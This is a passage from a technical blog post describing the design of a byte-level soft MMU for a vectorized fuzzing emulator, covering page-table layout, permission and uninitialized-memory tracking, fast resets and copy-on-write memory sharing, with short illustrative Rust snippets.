<h4 id="second-generation">Second generation</h4>
<p>While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages, allowed me to reset more specific dirty pages, and reduced the overall work for resets.</p>
<h4 id="third-generation">Third generation</h4>
<p>At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like <code class="language-plaintext highlighter-rouge">malloc()</code>. By setting permissions directly to the size actually requested by <code class="language-plaintext highlighter-rouge">malloc()</code> we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.</p>
<h4 id="fourth-generation">Fourth generation</h4>
<p>I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.</p>
<p>At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.</p>
<p>For example if the guest wanted to access address <code class="language-plaintext highlighter-rouge">0x13370000</code>, it would just directly dereference the memory at <code class="language-plaintext highlighter-rouge">0x13370000</code>. No translation, no base applied, simple.</p>
<p>You can see this code in the <code class="language-plaintext highlighter-rouge">srcs/emu</code> folder in <a href="https://github.com/gamozolabs/falkervisor_grilled_cheese">falkervisor</a>.</p>
<p>I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.</p>
<h4 id="fifth-generation">Fifth generation</h4>
<p>The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve its ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).</p>
<p>Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what <code class="language-plaintext highlighter-rouge">qemu-user</code> does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.</p>
<h4 id="sixth-generation">Sixth generation</h4>
<p>The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further, commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design…</p>
<hr />
<h1 id="page-tables">Page Tables</h1>
<p>Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.</p>
<p><img src="/assets/intel_4kib_4level_paging.png" alt="Page table" /></p>
<p>In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as <code class="language-plaintext highlighter-rouge">[9, 9, 9, 9, 12]</code> according to my dynamic paging model. This syntax will be explained later.</p>
<p>For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.</p>
<p>Here’s the actual metadata of a 4 KiB page on 64-bit Intel:</p>
<p><img src="/assets/intel_4kib_metadata.png" alt="Page table metadata" /></p>
<hr />
<h1 id="the-overall-design">The overall design</h1>
<p><em>My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.</em></p>
<p>When designing the new MMU there were a few critical features it needed:</p>
<ul>
<li>Byte level permissions</li>
<li>Fast snapshot/restore times</li>
<li>A data structure that could be quickly traversed in JIT</li>
<li>Quick process start times</li>
<li>The ability to handle full 64-bit address spaces</li>
<li>Low memory usage (we need to run 2048 VMs)</li>
<li>Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)</li>
<li>Must be easily tested for correctness</li>
<li>Ability to track uninitialized memory at a byte-level</li>
<li>Read-only memory shared between all cores</li>
</ul>
<h1 id="applying-byte-level-permissions">Applying byte-level permissions</h1>
<p>So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?</p>
<p>Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.</p>
<p>The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.</p>
<p>We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.</p>
<p>To remedy these problems there are a few solutions. We can use page heap in the application we’re taking a snapshot of, which will always ensure we have a page after the allocation we can play with for guard bytes. Further, page heap has the requested size in the metadata so we can get perfect byte-level permissions applied.</p>
<p>If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.</p>
<h4 id="getting-even-fancier">Getting even fancier</h4>
<p>When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.</p>
<hr />
<h1 id="design-features">Design features</h1>
<h4 id="basics-of-the-vectorized-model">Basics of the vectorized model</h4>
<p>This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.</p>
<p>Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VMs’ memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However, in the common case memory is accessed at the same address across all VMs and does not straddle an 8-byte boundary. It’s worth it.</p>
<p>For reference, the cost of a single load instruction <code class="language-plaintext highlighter-rouge">vmovdqa64</code> is about 4-5 cycles, where a <code class="language-plaintext highlighter-rouge">vpgatherqq</code> load is 20-30 cycles. Unless memory is frequently accessed from differing addresses or straddles 8-byte boundaries, it is always worth interleaving.</p>
<p>VM interleaving looks as follows:</p>
<p><em>chart simplified to show 4 lanes instead of 8</em></p>
<table>
<thead>
<tr>
<th>Guest Address</th>
<th>Host Address</th>
<th>Qword 1</th>
<th>Qword 2</th>
<th>Qword 3</th>
<th>…</th>
<th>Qword 8</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0000</td>
<td>0x0000</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>…</td>
<td>33</td>
</tr>
<tr>
<td>0x0008</td>
<td>0x0040</td>
<td>32</td>
<td>74</td>
<td>55</td>
<td>…</td>
<td>45</td>
</tr>
<tr>
<td>0x0010</td>
<td>0x0080</td>
<td>24</td>
<td>24</td>
<td>24</td>
<td>…</td>
<td>24</td>
</tr>
</tbody>
</table>
<p>This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte boundary things get quite slow, but this is a rare case and we’re not too concerned about it.</p>
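<p>To make the interleaving concrete, here’s a small illustrative helper (not from the actual JIT) that computes where a given lane’s copy of a guest byte lives, matching the chart above:</p>

```rust
/// Number of VM lanes interleaved on a core (8 for 64-bit lanes)
const NUM_LANES: u64 = 8;
/// Interleave granularity in bytes (one 64-bit qword per lane)
const GRANULE: u64 = 8;

/// Compute the host offset of `lane`'s copy of the byte at `guest_addr`.
fn interleaved_offset(guest_addr: u64, lane: u64) -> u64 {
    let qword  = guest_addr / GRANULE; // which guest 8-byte unit
    let offset = guest_addr % GRANULE; // byte within that unit
    // Each guest qword occupies NUM_LANES consecutive host qwords,
    // one per lane, so the stride per guest qword is 64 bytes
    qword * NUM_LANES * GRANULE + lane * GRANULE + offset
}
```

<p>With 8 lanes the stride per guest qword is 64 bytes, which is exactly why guest <code class="language-plaintext highlighter-rouge">0x0008</code> lands at host <code class="language-plaintext highlighter-rouge">0x0040</code> in the chart.</p>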
<h4 id="how-do-we-build-a-testable-model">How do we build a testable model?</h4>
<p>To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naively as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needed for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!</p>
<h4 id="64-bit-address-spaces">64-bit address spaces</h4>
<p>To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.</p>
<p>Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called <code class="language-plaintext highlighter-rouge">PAGE_TABLE_LAYOUT</code>. This is used in reality in the form: <code class="language-plaintext highlighter-rouge">const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];</code>.</p>
<p>This array defines the number of bits used for translating each level in the page table, and <code class="language-plaintext highlighter-rouge">PAGE_TABLE_DEPTH</code> sets the number of levels in the page table. In the example above this shows that we use the top 16 bits as the index for the first level, the next 16 bits for the next level, another 16 bits for the third level, a 13-bit level, and finally a 3-bit page size. As long as this <code class="language-plaintext highlighter-rouge">PAGE_TABLE_LAYOUT</code> adds up to 64 bits, contains at least 2 entries (a 1-level page table), and has a final translation size of at least 8 bytes (like in the example), the MMU and JITs will update accordingly. This allows profiling to be done on a specific target and the page table to be modified to whatever shape works best. This also allows trading between performance and memory usage as needed.</p>
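<p>As a sketch of how such a layout drives translation (the constants mirror the ones above, the helper itself is illustrative rather than the emulator’s real code), each level’s index is just a bit-slice of the address:</p>

```rust
/// Example layout from above: 16+16+16+13-bit table levels with a
/// 3-bit (8-byte) final page size; the entries must sum to 64
const PAGE_TABLE_DEPTH: usize = 5;
const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];

/// Split an address into per-level table indices; the final entry is
/// the byte offset within the page
fn split_address(addr: u64) -> [u64; PAGE_TABLE_DEPTH] {
    assert_eq!(PAGE_TABLE_LAYOUT.iter().sum::<u32>(), 64);

    let mut indices = [0u64; PAGE_TABLE_DEPTH];
    let mut remaining = 64;
    for (ii, &bits) in PAGE_TABLE_LAYOUT.iter().enumerate() {
        remaining -= bits;
        // Shift the slice down and mask it to `bits` wide
        indices[ii] = (addr >> remaining) & ((1u64 << bits) - 1);
    }
    indices
}
```

<p>Changing the shape is then just editing the constant; every consumer derives its shifts and masks from it.</p>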
<h4 id="fast-restores">Fast restores</h4>
<p>When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.</p>
<p>To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.</p>
<p>Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. <em>This was a decision driven by actual data on real targets, it’s much faster.</em></p>
<p>If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.</p>
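<p>A minimal sketch of this dirty-list model (the structure and names are assumptions for illustration, not the production code) looks like:</p>

```rust
/// Tracks dirtied pages in a linear list so a reset only touches
/// memory that was actually modified
struct DirtyTracker {
    /// Addresses of pages dirtied since the last reset
    dirty_list: Vec<u64>,
}

impl DirtyTracker {
    /// Record a write to `page_addr`; `dirty_bit` stands in for the
    /// final-level dirty flag so duplicates are never appended
    fn mark_dirty(&mut self, page_addr: u64, dirty_bit: &mut bool) {
        if !*dirty_bit {
            *dirty_bit = true;
            self.dirty_list.push(page_addr);
        }
    }

    /// Reset: walk only the linear list of dirtied pages instead of
    /// the whole page table, restoring each from the master copy
    fn reset(&mut self, mut restore_page: impl FnMut(u64)) {
        for &addr in &self.dirty_list {
            restore_page(addr);
        }
        self.dirty_list.clear();
    }
}
```

<p>In the real JIT the equivalent of <code class="language-plaintext highlighter-rouge">mark_dirty</code> running out of list space is what triggers the special VM-exit described above.</p>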
<p>Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called <a href="https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/page-modification-logging-vmm-white-paper.pdf">Page Modification Logging</a>). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.</p>
<h4 id="permissions">Permissions</h4>
<p>On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.</p>
<p>Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.</p>
<p>There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.</p>
<p>In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.</p>
<p>In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to both the permissions and the memory contents. Further, in memory the permissions come first, followed by the contents. Since permissions are checked first this allows the memory to be accessed linearly, potentially getting a speedup from the hardware prefetchers.</p>
<p>When permissions and contents are laid out in a pretty format it looks something like:</p>
<p><em>Simplified to 4 lanes instead of 8</em>
<img src="/assets/mmu_layout.png" alt="MMU layout" /></p>
<p>We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.</p>
<h4 id="uninitialized-memory-tracking">Uninitialized memory tracking</h4>
<p>To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.</p>
<p>On all writes to memory the RaW bit is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than to have a conditional operation.</p>
<p>Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. <code class="language-plaintext highlighter-rouge">malloc()</code>ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!</p>
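<p>The write-path permission update can be sketched as follows; the specific bit assignments are assumptions for illustration, the key part being that the shift distance maps the RaW bit onto the read bit so no branch is needed:</p>

```rust
/// Byte-level permission bits (bit positions are illustrative)
const PERM_READ:  u8 = 1 << 0;
const PERM_WRITE: u8 = 1 << 1;
const PERM_EXEC:  u8 = 1 << 2;
/// Read-after-write: memory becomes readable once written
const PERM_RAW:   u8 = 1 << 3;

/// On every write, unconditionally shift-and-or the RaW bit down into
/// the read bit; cheaper than a conditional operation
fn update_perms_on_write(perm: u8) -> u8 {
    perm | ((perm & PERM_RAW) >> 3)
}
```

<p>A byte marked <code class="language-plaintext highlighter-rouge">PERM_WRITE | PERM_RAW</code> is unreadable until the first write flips its read bit on, which is exactly the uninitialized-memory behavior described above.</p>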
<hr />
<h1 id="gage-fuzzing">Gage fuzzing</h1>
<p>Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further, I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of that pointer as read-after-write as well.</p>
<p>As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.</p>
<p>This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.</p>
<p>This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!</p>
<p><em>I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.</em></p>
<hr />
<h1 id="theory-into-practice">Theory into practice</h1>
<p>So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.</p>
<p>We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.</p>
<h4 id="64-bit-saves-the-day">64-bit saves the day</h4>
<p>Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.</p>
<p>Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.</p>
<p>In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.</p>
<h4 id="handling-non-present-pages">Handling non-present pages</h4>
<p>Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.</p>
<p>If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.</p>
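<p>Here’s an illustrative model of such a metadata-less walk. The real entries are raw host pointers; for a safe, runnable sketch the tables live in an arena and entries hold arena indices, with 0 doubling as “not present” just like a NULL pointer:</p>

```rust
/// Assumed low metadata bits on the final level (e.g. the dirty bit)
const METADATA_MASK: u64 = 0x7;

/// Walk one table index per level through `arena`; `None` models the
/// page-fault VM-exit taken on a zero entry
fn walk(arena: &[Vec<u64>], indices: &[usize]) -> Option<u64> {
    let mut table = 0usize; // root table is arena[0]
    // Intermediate levels: no masking, just dereference-and-check
    for &idx in &indices[..indices.len() - 1] {
        let entry = arena[table][idx];
        if entry == 0 {
            return None; // non-present entry -> fault
        }
        table = entry as usize;
    }
    // Final level: mask off the metadata bits to get the translation
    let entry = arena[table][*indices.last().unwrap()];
    if entry == 0 {
        return None;
    }
    Some(entry & !METADATA_MASK)
}
```

<p>Note the intermediate levels do no masking at all, which is the whole point of keeping them metadata-free.</p>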
<h4 id="what-is-a-page-fault">What is a page fault?</h4>
<p>In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a <code class="language-plaintext highlighter-rouge">ret</code> allows us to exit from the emulator at any time.</p>
<p>Further since it’s possible VMs could have different permissions or page tables, we report a <code class="language-plaintext highlighter-rouge">caused_vmexit</code> mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.</p>
<h1 id="memory-costs">Memory costs</h1>
<p>Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.</p>
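<p>The commit-size arithmetic is simple enough to capture in a couple of lines (a sketch mirroring the numbers above):</p>

```rust
/// Smallest possible commit size for one page on one hardware thread:
/// page bytes, times the number of interleaved VMs, times 2 for the
/// permission byte that accompanies every content byte
fn commit_size(page_size: u64) -> u64 {
    const NUM_VMS: u64 = 8;
    page_size * NUM_VMS * 2
}
```

<p>An 8-byte page thus commits 128 bytes, while a traditional 4096-byte page balloons to 64 KiB.</p>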
<h1 id="saving-time-and-memory">Saving time and memory</h1>
<p>We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This meant it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process, even with a hard ctrl+c.</p>
<p>To remedy this, everything we do is <em>lazy</em>. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.</p>
<h4 id="vms-have-no-memory-to-start-off">VMs have no memory to start off</h4>
<p>When a VM launches it has zero memory in its MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.</p>
<h4 id="so-where-does-memory-come-from">So where does memory come from?</h4>
<p>Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.</p>
<p>We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.</p>
<p>This has the awesome effect that only memory which is actually touched is ever brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your heart’s desire.</p>
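<p>A minimal sketch of the lazy model, assuming tiny 8-byte pages and an illustrative <code class="language-plaintext highlighter-rouge">Mmu</code> type: the MMU starts empty and an installed handler materializes pages (e.g. from the snapshot on disk) only when they are first touched.</p>

```rust
use std::collections::HashMap;

struct Mmu {
    pages: HashMap<u64, Vec<u8>>,
    // Installed exception handler: returns page contents if the snapshot
    // has memory for this page, otherwise the fault is unhandled
    fault_handler: fn(u64) -> Option<Vec<u8>>,
}

impl Mmu {
    fn read(&mut self, addr: u64) -> Option<u8> {
        const PAGE: u64 = 8; // tiny page size, as in the design above
        let base = addr & !(PAGE - 1);
        if !self.pages.contains_key(&base) {
            // Fault: lazily pull the page in via the handler, then resume
            let page = (self.fault_handler)(base)?;
            self.pages.insert(base, page);
        }
        Some(self.pages[&base][(addr - base) as usize])
    }
}

// Stand-in "snapshot": only addresses below 0x100 are backed
fn snapshot(base: u64) -> Option<Vec<u8>> {
    if base < 0x100 { Some(vec![base as u8; 8]) } else { None }
}

fn main() {
    let mut mmu = Mmu { pages: HashMap::new(), fault_handler: snapshot };
    assert_eq!(mmu.read(0x13), Some(0x10)); // faulted in on first touch
    assert_eq!(mmu.read(0x1000), None);     // not in the snapshot
    assert_eq!(mmu.pages.len(), 1);         // only touched memory was loaded
}
```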
<h1 id="sharing-memory--forking">Sharing memory / forking</h1>
<p>Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.</p>
<p>We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.</p>
<p>When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.</p>
<p>When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an <code class="language-plaintext highlighter-rouge">aliased</code> bit on the last level page table, next to the <code class="language-plaintext highlighter-rouge">dirty</code> bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.</p>
<p>To allow for writes to the VM we add another bit to the last level page tables, a <code class="language-plaintext highlighter-rouge">cow</code>, or copy-on-write, bit. This is always accompanied with the <code class="language-plaintext highlighter-rouge">aliased</code> bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.</p>
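<p>The aliased/CoW decision on a write can be sketched like this (bit positions are assumptions for illustration; the real layout lives in the last-level page table entries):</p>

```rust
const DIRTY: u64   = 1 << 0; // assumed bit positions
const ALIASED: u64 = 1 << 1;
const COW: u64     = 1 << 2;

/// Returns the page entry the write may proceed on, or `None` for a fault.
fn on_write(entry: u64, copy_page: impl FnOnce(u64) -> u64) -> Option<u64> {
    if entry & ALIASED != 0 {
        if entry & COW != 0 {
            // Copy-on-write: clone the master's page, the child now owns it
            return Some(copy_page(entry & !(DIRTY | ALIASED | COW)));
        }
        // Aliased without CoW: the master's memory must never be updated
        return None;
    }
    // Child-owned page: write in place
    Some(entry & !(DIRTY | ALIASED | COW))
}

fn main() {
    let copy_page = |page| page + 0x100; // stand-in for cloning the backing
    assert_eq!(on_write(0x1000 | ALIASED | COW, copy_page), Some(0x1100));
    assert_eq!(on_write(0x1000 | ALIASED, copy_page), None); // fault
    assert_eq!(on_write(0x1000, copy_page), Some(0x1000));   // owned
}
```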
<h1 id="an-example-in-aliasedcowed-memory-access">An example in aliased/CoWed memory access</h1>
<p>This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.</p>
<ul>
<li>An empty master MMU is created</li>
<li>An exception handler is added to the master MMU that faults in pages from the disk on-demand</li>
<li>A child is forked from the master</li>
<li>A <strong>read</strong> occurs to a page in the child</li>
<li>This causes an exception in the child as it has no memory</li>
<li>The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page</li>
<li>The master has no memory for this page and causes an exception</li>
<li>The master’s exception handler handles loading the page from disk, creating an entry</li>
<li>The master returns out with exception handled</li>
<li>The child directly links in the master’s page as aliased</li>
<li>Child returns with no exception</li>
<li>Child then dispatches a <strong>write</strong> to the same memory</li>
<li>The page is marked as aliased and thus cannot be written to</li>
<li>A copy of the master’s page is made</li>
<li>The permissions are checked in the page for write-access for all bytes being written to</li>
<li>The write occurs in the child-owned page</li>
<li>Success</li>
</ul>
<p>While this is quite slow for the initial access, the child maintains its CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.</p>
<p>The overall result of this model is that memory is only ever read from disk if it is actually used, and only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.</p>
<p>In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but improves performance.</p>
<p>All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.</p>
<p>This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.</p>
<h1 id="deduplicated-memory">Deduplicated memory</h1>
<p>Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!</p>
<p>Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.</p>
